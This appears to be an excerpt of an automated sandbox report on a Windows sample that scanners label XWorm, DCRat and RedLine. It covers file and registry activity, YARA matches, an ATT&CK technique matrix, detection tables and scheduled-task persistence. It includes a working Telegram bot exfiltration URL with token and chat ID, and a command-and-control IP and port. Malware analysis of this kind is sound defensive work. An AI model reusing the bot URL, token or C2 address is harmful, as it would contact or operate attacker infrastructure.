                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\Update.exe Queries volume information: C:\Users\user\AppData\Roaming\Update.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXE Queries volume information: C:\Users\user\AppData\Local\Temp\cnvwov.EXE VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Queries volume information: C:\agentwebreviewDhcp\portBrowserweb.exe VolumeInformation
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\Program Files\Windows Mail\System.exe Queries volume information: C:\Program Files\Windows Mail\System.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe Code function: 24_2_00C7DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,24_2_00C7DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe Code function: 24_2_00C6B146 GetVersionExW,24_2_00C6B146
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2751379644.000000001B3F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ndows Defender\MsMpeng.exe
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2757698692.000000001C0C0000.00000004.00000020.00020000.00000000.sdmp, HaLCYOFjMN.exe, 00000005.00000002.2751379644.000000001B447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                    Stealing of Sensitive Information

                                    Source: Yara match File source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: Process Memory Space: portBrowserweb.exe PID: 7392, type: MEMORYSTR
                                    Source: Yara match File source: 24.3.rqbprm.exe.73bc6d7.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 24.3.rqbprm.exe.6aa46d7.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 24.3.rqbprm.exe.6aa46d7.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 33.0.portBrowserweb.exe.3e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 24.3.rqbprm.exe.73bc6d7.1.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 00000021.00000000.2338852988.00000000003E2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, type: DROPPED
                                    Source: Yara match File source: C:\agentwebreviewDhcp\portBrowserweb.exe, type: DROPPED
                                    Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, type: DROPPED
                                    Source: Yara match File source: C:\Program Files\Windows Mail\System.exe, type: DROPPED
                                    Source: Yara match File source: C:\agentwebreviewDhcp\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara match File source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, type: DROPPED
                                    Source: Yara match File source: Process Memory Space: cnvwov.EXE PID: 1860, type: MEMORYSTR
                                    Source: Yara match File source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: Yara match File source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                    Source: Yara match File source: Process Memory Space: HaLCYOFjMN.exe PID: 720, type: MEMORYSTR
                                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                                    Source: Yara match File source: 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000005.00000002.2734936969.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                                    Remote Access Functionality

                                    Source: Yara match File source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: Process Memory Space: portBrowserweb.exe PID: 7392, type: MEMORYSTR
                                    Source: Yara match File source: 24.3.rqbprm.exe.73bc6d7.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 24.3.rqbprm.exe.6aa46d7.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 24.3.rqbprm.exe.6aa46d7.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 33.0.portBrowserweb.exe.3e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 24.3.rqbprm.exe.73bc6d7.1.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 00000021.00000000.2338852988.00000000003E2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, type: DROPPED
                                    Source: Yara match File source: C:\agentwebreviewDhcp\portBrowserweb.exe, type: DROPPED
                                    Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, type: DROPPED
                                    Source: Yara match File source: C:\Program Files\Windows Mail\System.exe, type: DROPPED
                                    Source: Yara match File source: C:\agentwebreviewDhcp\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara match File source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, type: DROPPED
                                    Source: Yara match File source: Process Memory Space: cnvwov.EXE PID: 1860, type: MEMORYSTR
                                    Source: Yara match File source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: Yara match File source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                    Source: Yara match File source: Process Memory Space: HaLCYOFjMN.exe PID: 720, type: MEMORYSTR
                                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                                    Source: Yara match File source: 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000005.00000002.2734936969.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts221
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    DLL Side-Loading
                                    11
                                    Disable or Modify Tools
                                    11
                                    Input Capture
                                    1
                                    System Time Discovery
                                    1
                                    Taint Shared Content
                                    11
                                    Archive Collected Data
                                    1
                                    Web Service
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter
                                    1
                                    DLL Side-Loading
                                    12
                                    Process Injection
                                    11
                                    Deobfuscate/Decode Files or Information
                                    LSASS Memory3
                                    File and Directory Discovery
                                    Remote Desktop Protocol1
                                    Screen Capture
                                    1
                                    Ingress Tool Transfer
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job
                                    1
                                    Scheduled Task/Job
                                    1
                                    Scheduled Task/Job
                                    3
                                    Obfuscated Files or Information
                                    Security Account Manager57
                                    System Information Discovery
                                    SMB/Windows Admin Shares11
                                    Input Capture
                                    11
                                    Encrypted Channel
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    PowerShell
                                    31
                                    Registry Run Keys / Startup Folder
                                    31
                                    Registry Run Keys / Startup Folder
                                    21
                                    Software Packing
                                    NTDS571
                                    Security Software Discovery
                                    Distributed Component Object ModelInput Capture1
                                    Non-Standard Port
                                    Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Timestomp
                                    LSA Secrets2
                                    Process Discovery
                                    SSHKeylogging2
                                    Non-Application Layer Protocol
                                    Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    DLL Side-Loading
                                    Cached Domain Credentials161
                                    Virtualization/Sandbox Evasion
                                    VNCGUI Input Capture13
                                    Application Layer Protocol
                                    Data Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    File Deletion
                                    DCSync1
                                    Application Window Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job33
                                    Masquerading
                                    Proc Filesystem1
                                    System Network Configuration Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
                                    Virtualization/Sandbox Evasion
                                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                                    Process Injection
                                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
[Behavior graph: Behavior Graph ID: 1585491, Sample: HaLCYOFjMN.exe, Startdate: 07/01/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
HaLCYOFjMN.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
HaLCYOFjMN.exe | 100% | Avira | TR/Spy.Gen |
HaLCYOFjMN.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\jxseyegkwF.bat | 100% | Avira | BAT/Delbat.C |
C:\Program Files\Windows Mail\System.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\cnvwov.EXE | 100% | Avira | TR/Spy.RedLine.hgyva |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\rqbprm.exe | 100% | Avira | VBS/Runner.VPG |
C:\Users\user\Desktop\IJgIaehv.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Users\user\AppData\Roaming\Update.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Windows Mail\System.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\rqbprm.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\IJgIaehv.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Program Files\Windows Mail\System.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\AppData\Local\Temp\cnvwov.EXE | 68% | ReversingLabs | ByteCode-MSIL.Ransomware.RedLine |
C:\Users\user\AppData\Local\Temp\rqbprm.exe | 74% | ReversingLabs | Win32.Trojan.Uztuby |
C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\IJgIaehv.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\MwyHCbxj.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\RjQGfYMX.log | 5% | ReversingLabs | |
C:\Users\user\Desktop\WfRXmDCR.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\cXuwPjHF.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\gOlnWgHy.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\hLMvsgWt.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\mGNMzMMn.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\nuSUkZIl.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\poUkcZma.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\vphcjoRU.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\yaMsqCcN.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\zXoALCrI.log | 21% | ReversingLabs | |
C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\agentwebreviewDhcp\WmiPrvSE.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\agentwebreviewDhcp\portBrowserweb.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://api.ip.s | 0% | Avira URL Cloud | safe |
http://crl.m)1 | 0% | Avira URL Cloud | safe |
94.141.122.161:7771 | 0% | Avira URL Cloud | safe |
94.141.122.161 | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
122295cm.n9shteam.in | 104.21.48.1 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7568949165:AAGgQ5jLJjKDrnOV8dm-jnLIdWR-IOeUVTQ/sendMessage?chat_id=7733551555&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A23A5CC5CF533B5EED372%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ST_D6%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20nursultan | false | | high
94.141.122.161:7771 | true | Avira URL Cloud: safe | unknown
94.141.122.161 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
94.141.122.161 | unknown | Russian Federation | 43429 | UNITLINE_RST_NET1RostovnaDonuRU | true

                                                                                            IP
                                                                                            127.0.0.1

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585491
Start date and time: 2025-01-07 18:01:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 57
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HaLCYOFjMN.exe (renamed because original name is a hash value)
Original Sample Name: 3c30d3b3706b97a2a0638180bb159b44.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@81/76@3/4
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 25%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 56%
                                                                                            • Number of executed functions: 301
                                                                                            • Number of non-executed functions: 81
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 172.202.163.200
                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target Update.exe, PID 1416 because it is empty
                                                                                            • Execution Graph export aborted for target Update.exe, PID 1516 because it is empty
                                                                                            • Execution Graph export aborted for target Update.exe, PID 5820 because it is empty
                                                                                            • Execution Graph export aborted for target Update.exe, PID 7188 because it is empty
                                                                                            • Execution Graph export aborted for target portBrowserweb.exe, PID 7392 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6768 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7692 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7912 because it is empty
                                                                                            • Not all processes were analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                            • VT rate limit hit for: HaLCYOFjMN.exe
Time | Type | Description
12:02:09 | API Interceptor | 51x Sleep call for process: powershell.exe modified
13:14:41 | API Interceptor | 218173x Sleep call for process: HaLCYOFjMN.exe modified
13:14:55 | API Interceptor | 2x Sleep call for process: svchost.exe modified
19:14:42 | Task Scheduler | Run new task: Update path: C:\Users\user\AppData\Roaming\Update.exe
19:14:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update C:\Users\user\AppData\Roaming\Update.exe
19:14:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update C:\Users\user\AppData\Roaming\Update.exe
19:15:23 | Task Scheduler | Run new task: System path: "C:\Program Files\Windows Mail\System.exe"
19:15:24 | Task Scheduler | Run new task: SystemS path: "C:\Program Files\Windows Mail\System.exe"
19:15:29 | Task Scheduler | Run new task: Idle path: "C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe"
19:15:29 | Task Scheduler | Run new task: IdleI path: "C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe"
19:15:30 | Task Scheduler | Run new task: portBrowserweb path: "C:\agentwebreviewDhcp\portBrowserweb.exe"
19:15:31 | Task Scheduler | Run new task: portBrowserwebp path: "C:\agentwebreviewDhcp\portBrowserweb.exe"
